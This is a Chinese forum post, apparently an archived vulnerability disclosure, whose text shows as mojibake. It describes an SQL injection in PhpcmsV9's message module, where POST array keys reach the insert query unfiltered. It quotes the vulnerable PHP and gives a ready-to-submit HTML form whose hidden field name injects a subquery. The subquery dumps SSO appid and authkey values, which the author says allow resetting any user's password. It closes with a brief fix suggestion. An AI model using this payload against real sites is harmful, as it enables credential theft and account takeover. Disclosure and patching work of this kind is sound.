PhpcmsV9 SQL×¢ÉäÐÞ¸ÄÈÎÒâÓÃ»§ÃÜÂëÂ©¶´

admin ·¢±íÓÚ 2013-2-23 11:33:10

¼òÒªÃèÊö£º

µÚ¶þ·¢ÈçÔ¼À´µ½£¬¸ÐÐ»´ó¼ÒµÄ¹Ø×¢£¬ÔÚµÚ¶þ·¢ÖÐÊ¹ÓÃÁËÒ»¸öÎÞÏÞÖÆµÄSQL×¢Éä£¬×îÖÕÄ¿µÄ¿ÉÒÔÐÞ¸ÄÈÎÒâÓÃ»§ÃÜÂë£¬½¨ÒéÈ·ÈÏ°²È«Î£º¦µÈ¼¶Îª¸ß¡£

Ã÷ÌìÔÙ¸üÐÂÏÂÒ»¸öÂ©¶´¡£
ÏêÏ¸ËµÃ÷£º
ÔÚ/phpcms9/phpcms/modules/message/index.phpÖÐÓÐ´úÂëÈçÏÂ£º

$messageid = $this->message_db->insert($_POST['info'],true);

insert·½·¨ÊÇkey valueµÄ£¬´úÂëÈçÏÂ£º

public function insert($data, $table, $return_insert_id = false, $replace = false) {
            if(!is_array( $data ) || $table == '' || count($data) == 0) {
                     return false;
            }

            $fielddata = array_keys($data);
            $valuedata = array_values($data);
            array_walk($fielddata, array($this, 'add_special_char'));
            array_walk($valuedata, array($this, 'escape_string'));

            $field = implode (',', $fielddata);
            $value = implode (',', $valuedata);

            $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
            $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
            $return = $this->execute($sql);
            return $return_insert_id ? $this->insert_id() : $return;
   }

àÅ£¬ºÜÒÅº¶µÄÊÇ

array_walk($fielddata, array($this, 'add_special_char'));

ÖÐ²¢Ã»ÓÐ¶Ôkey×öÈÎºÎµÄ¹ýÂË£¬ËùÒÔ£¬µÚÒ»¶ÎÌáµ½µÄ´úÂëµ¼ÖÂÁËÒ»¸öSQL×¢ÉäÂ©¶´ £º£¨¡£

µ½´Ë£¬ÎªÁËpocÒ»ÏÂ£¬ÎÒ¶ÁÈ¡ÁËÎÒ±¾µØµÄauthkey£¬½ÓÏÂÀ´ÎÒÒÑ¾¿ÉÒÔÖØÖÃÈÎÒâÓÃ»§ÃÜÂëÁË£¬ºóÃæµÄÊÂÇéÎÒ¾ÍÃ»ÓÐÑÝÊ¾ÁË¡£

Â©¶´Ö¤Ã÷£º
¶Á³öÁËphpsso_serverµÄappidºÍauthkey£¬È»ºó¿ÉÒÔµ÷ÓÃclient.class.phpÖÐµÄps_member_editº¯ÊýÐÞ¸ÄÈÎÒâÓÃ»§ÃÜÂë¡£

±íµ¥ÈçÏÂ£ºÓÃ»§ÃûÊ²Ã´µÄµÃ×Ô¼º¸ÄÒ»¸Ä¡£
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
<table width="100%" cellspacing="0" class="table_form">
<tr>
<th>±ê Ìâ£º</th>
<td><input name="info" type="text" id="subject" size="30" value="Re: hh"class="input-text"/></td>
</tr>
<tr>
<th>ÄÚ ÈÝ£º</th>
<td><textarea name="info"id="con" rows="5" cols="50"></textarea></td>
</tr>
<input type="hidden" name="info" value="2" />
<input type="hidden" name="info" value="cc" />
<input type="hidden" name="info" value="hh">

<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />

<tr>
<th>ÑéÖ¤Âë£º</th>
<td><input name="code" type="text" id="code" size="10"class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
<tr>
<td></td>
<td colspan="2"><label>
<input type="submit" name="dosubmit" id="dosubmit" value="È· ¶¨" class="button"/>
</label></td>
</tr>
</table>
</form>
ÔÚadd_special_charº¯ÊýÄÚ¶Ôkey×ö¹ýÂË¾Í¿ÉÒÔÁË¡£

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

PhpcmsV9 SQL×¢ÉäÐÞ¸ÄÈÎÒâÓÃ»§ÃÜÂëÂ©¶´